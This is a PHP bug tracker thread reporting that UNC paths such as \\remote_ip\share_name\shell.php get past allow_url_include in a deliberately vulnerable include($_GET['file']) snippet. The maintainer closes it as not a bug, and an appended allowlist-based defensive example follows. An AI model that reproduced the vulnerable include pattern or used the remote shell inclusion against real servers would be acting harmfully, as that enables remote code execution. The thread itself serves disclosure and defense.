Sec Bug #78005 Remote File Inclusion protection bypass in PHP version 7.1.29
Submitted: 2019-05-12 11:27 UTC Modified: 2019-05-13 15:40 UTC
From: manish1046 at gmail dot com Assigned: cmb (profile)
Status: Not a bug Package: Filter related
PHP Version: 7.1.29 OS: Windows
Private report: No CVE-ID: None
 [2019-05-12 11:27 UTC] manish1046 at gmail dot com
Description:
------------
I was performing a Remote File Inclusion attack against the following vulnerable code:

<?php 
include($_GET['file']);
?>

In the PHP.ini file, I changed only the setting for 'allow_url_fopen' and set it to "Off". 'allow_url_include' is also set to "Off".

When I tried to include a PHP code file hosted remotely (over HTTP), the vulnerable code did not include the PHP code from the remote URL.
But PHP has a behaviour where it makes a request to an SMB share even if it is hosted remotely.

Now, when I configured an SMB share with anonymous read access enabled on it, hosted PHP code on that share, and asked the vulnerable PHP code to include the PHP code hosted over SMB, it worked.
For example,

http://192.168.56.103/vuln.php?file=\\remote_ip\share_name\shell.php

When performing this test, both 'allow_url_fopen' and 'allow_url_include' were set to "Off".


 [2019-05-13 12:00 UTC] cmb@php.net
-Status: Open +Status: Feedback -Assigned To: +Assigned To: cmb
 [2019-05-13 12:00 UTC] cmb@php.net
So basically vuln.php is doing:

  <?php
  include('\\remote_ip\share_name\shell.php');

Since UNC paths are not URLs, they are not subject to allow_url_*.
Am I missing something?
 [2019-05-13 12:14 UTC] manish1046 at gmail dot com
-Status: Feedback +Status: Assigned
 [2019-05-13 12:14 UTC] manish1046 at gmail dot com
Hello,

Yes, you are right. 
So in this case PHP is not going to block the Remote URL inclusion? Is this the expected behaviour?

And one more thing: what if the code is including from WebDAV URLs?
For example:

<?php 

include('//remote_ip/file.php');

?> 

Again, in this case also PHP is not going to prevent it?

Thank You
Manish
 [2019-05-13 14:04 UTC] cmb@php.net
-Status: Assigned +Status: Not a bug
 [2019-05-13 14:04 UTC] cmb@php.net
PHP doesn't regard UNC file paths as URLs, so these are not
affected by the allow_url_* INI directives.
 [2019-05-13 15:40 UTC] manish1046 at gmail dot com
Oh. Thank You for your time and explanation.
Take care (y)
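
Following the conclusion of this thread (UNC paths are treated as file paths, so the allow_url_* directives do not cover them), here is an added example, not part of the original report or of PHP itself, that resolves an include target from an allowlist and rejects UNC-style and scheme-prefixed input. The PAGES map, the helper names and the temporary demo directory are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: request value => file name inside the pages directory.
const PAGES = ['home' => 'home.php', 'contact' => 'contact.php'];

// True for UNC-style paths (\\host\share, //host/share) and scheme:// wrappers.
function is_remote_like(string $path): bool
{
    $normalized = str_replace('\\', '/', $path);
    if (strncmp($normalized, '//', 2) === 0) {
        return true;
    }
    return preg_match('#^[a-z][a-z0-9+.\-]*://#i', $normalized) === 1;
}

// Map a request value to a canonical file under $baseDir, or null if rejected.
function resolve_include(string $requested, string $baseDir): ?string
{
    if (is_remote_like($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $real === false) {
        return null;
    }
    // The canonical target must still sit inside the base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed demo: a temporary pages directory and sample request values,
// including the two path shapes quoted in the report.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home';\n");

$samples = ['home', '\\\\remote_ip\\share_name\\shell.php',
            '//remote_ip/file.php', 'http://remote_ip/x.php', '../vuln'];
foreach ($samples as $s) {
    $target = resolve_include($s, $dir);
    echo str_pad($s, 36), ' => ', $target ?? 'rejected', PHP_EOL;
}
```

Only the allowlisted value resolves to a file; the request value itself never reaches include, so the UNC check acts as a second layer rather than the sole control.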
Last updated: Tue Sep 29 15:01:25 2020 UTC